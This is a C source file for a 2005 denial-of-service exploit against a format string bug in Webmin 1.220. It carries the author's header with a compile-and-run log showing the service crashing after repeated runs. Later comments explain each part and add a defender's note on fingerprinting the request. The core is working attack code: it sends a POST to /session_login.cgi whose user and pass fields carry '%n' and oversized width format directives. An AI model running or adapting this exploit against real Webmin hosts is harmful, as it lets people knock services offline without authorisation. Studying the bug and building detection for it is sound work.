/*

Webmin Format string bug DoS sploit :) it took a few minutes of my life...

Tested against Webmin Version 1.220 on FreeBSD 6 and perl 5.8.7 (Webmin crashes)

http://www.critical.lt/research/webmin_dos.c

[mircia@critical ~ ] cc webmin_dos.c -o webdos
webmin_dos.c: In function `main':
webmin_dos.c:77: warning: passing arg 1 of `sprintf' from incompatible pointer type
webmin_dos.c:79: warning: passing arg 1 of `sprintf' from incompatible pointer type
webmin_dos.c:82: warning: passing arg 1 of `strlen' from incompatible pointer type
webmin_dos.c:84: warning: passing arg 1 of `strlen' from incompatible pointer type
[mircia@critical ~ ] ./webdos localhost       
Quick'n'Dirty DoS exploit to webmin's format string bug (c) Critical Security, 2005-11[*] Initiating attack against localhost
done
[mircia@critical ~ ] ./webdos localhost
Quick'n'Dirty DoS exploit to webmin's format string bug (c) Critical Security, 2005-11[*] Initiating attack against localhost
done
[mircia@critical ~ ] ./webdos localhost
Quick'n'Dirty DoS exploit to webmin's format string bug (c) Critical Security, 2005-11[*] Initiating attack against localhost
done
[mircia@critical ~ ] ./webdos localhost
Quick'n'Dirty DoS exploit to webmin's format string bug (c) Critical Security, 2005-11[*] Initiating attack against localhost
done
[mircia@critical ~ ] ./webdos localhost
Quick'n'Dirty DoS exploit to webmin's format string bug (c) Critical Security, 2005-11[*] Initiating attack against localhost
done
[mircia@critical ~ ] ./webdos localhost
Quick'n'Dirty DoS exploit to webmin's format string bug (c) Critical Security, 2005-11[*] Initiating attack against localhost
connect: Connection refused
Webmin is probably down...

Usually 2-7 times are enough, if patched you will probably be banned after 5 times by default :)

*/

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define PORT 10000 // change it

/*
 * Entry point: opens one TCP connection to argv[1] on PORT and sends a
 * single hand-built HTTP POST to /session_login.cgi, then exits. Each run
 * is one request; the session log in the file header shows the author
 * invoking it repeatedly until the service stops answering.
 *
 * argv[1]  hostname or IP of the target (resolved with gethostbyname()).
 * Returns 1 if socket() fails, 2 if name resolution or connect() fails,
 * 0 after the request has been written. With no argument it prints a
 * usage line and falls off the end of main (implicitly 0 under C99).
 *
 * Defender's note: the request is trivially fingerprintable — a POST to
 * /session_login.cgi whose form body carries "%25n" (URL-encoded "%n")
 * and an oversized width field in both the user= and pass= parameters.
 * The header also notes that patched Webmin blocks the source after a
 * handful of failed logins, so repeated hits from one IP are the signal.
 *
 * Known defects in the original code (left untouched here):
 *  - close()/write() are used without <unistd.h>, so they are implicitly
 *    declared (invalid since C99).
 *  - hostline and ilgis are arrays of char* used as raw byte buffers; the
 *    sprintf/strlen warnings quoted in the header come from these lines.
 *  - bytes and buf are declared but never used.
 *  - the HTTP request uses bare "\n" line endings instead of "\r\n".
 */
int main(int argc, char *argv[]) {
  int s;                       /* client socket descriptor */
  register int bytes;          /* unused */
  struct sockaddr_in sa;       /* target address, filled in below */
  struct hostent *he;          /* result of gethostbyname(host) */
  char buf[BUFSIZ+1];          /* unused */
  char *host;                  /* alias for argv[1] */
  
  /* Socket is created before the argument check, so the usage path leaks it. */
  if ((s = socket(PF_INET, SOCK_STREAM, 0)) < 0) {
    perror("pizute");
    return 1;
  }

  /* bzero/bcopy are legacy BSD calls; on this platform they come in via
   * <string.h> (the file never includes <strings.h>). */
  bzero(&sa, sizeof sa);

  sa.sin_family = AF_INET;
  
  if (argc <= 1) {
  
  
  printf("%s%s%s","Usage: ",argv[0]," hostname or ip\n\n");
  
   } else {   
 
  host = (char *)argv[1];
  sa.sin_port = htons(PORT);   /* PORT is the compile-time #define above */

  if ((he = gethostbyname(host)) == NULL) {
    perror(host);
    return 2;
  }
  
    /* No trailing newline on the banner, which is why the "[*]" line is
     * glued to it in the captured output in the header. */
    printf ("Quick'n'Dirty DoS exploit to webmin's format string bug (c) Critical Security, 2005-11");
    printf ("%s%s%s","[*] Initiating attack against ",host, "\n");
 
    /* Copy the first resolved address into sa.sin_addr (IPv4 only). */
    bcopy(he->h_addr_list[0],&sa.sin_addr, he->h_length);

 if (connect(s, (struct sockaddr *)&sa, sizeof sa) < 0) {
    perror("connect");
    printf("Webmin is probably down...\n");
    close(s);
    return 2;
  }


// actually the code is so dirty that sometimes u just have to think why does this crap work 
 
/* Request is assembled from five fragments written back to back:
 *   req      - request line + User-Agent
 *   hostline - "Host: <host>:<PORT>\n", built with sprintf below
 *   req1     - remaining headers, ending in "Content-Length: " (no value yet)
 *   ilgis    - the Content-Length value plus "\n"
 *   dashit   - leading "\n" (blank line ending the headers), the form body,
 *              then "\n\n"
 */
char *req = "POST /session_login.cgi HTTP/1.1\nUser-Agent: Mozilla/4.0\n";
char *hostline[200];   /* array of 200 pointers, (mis)used as a byte buffer */
char *req1 = "Accept: text/html, application/xml;q=0.9\nAccept-Language: en\nAccept-Encoding: deflate\nConnection: Keep-Alive\nCookie: testing=1; path=/\nContent-Type: application/x-www-form-urlencoded\nContent-Length: ";
/* Form body: "%25n" decodes to "%n" and "%250999..." to "%0999...d" on the
 * server side; these are the format directives the vulnerable CGI ends up
 * interpreting, per the author's description in the file header. */
char *dashit = "\npage=%2F&user=%25n%250999999999999999d&pass=%25n%250999999999999999d\n\n";

char *ilgis[100];      /* array of 100 pointers, (mis)used as a byte buffer */


sprintf(hostline,"%s%s%s%d\n","Host: ",host,":",PORT);

/* Content-Length = strlen(dashit) minus the leading "\n" and trailing "\n\n".
 * Note strlen() returns size_t but is printed with %d. */
sprintf(ilgis,"%d\n",strlen(dashit) - 3);

/* Return values of write() are not checked; a short write is silently
 * ignored and the program still reports "done". */
write(s,req,strlen(req));
write(s,hostline,strlen(hostline));
write(s,req1,strlen(req1));
write(s,ilgis,strlen(ilgis));
write(s,dashit,strlen(dashit));




/* The response is never read; "done" only means the request was sent. */
printf("done\n");


  close(s);
  return 0;

}}
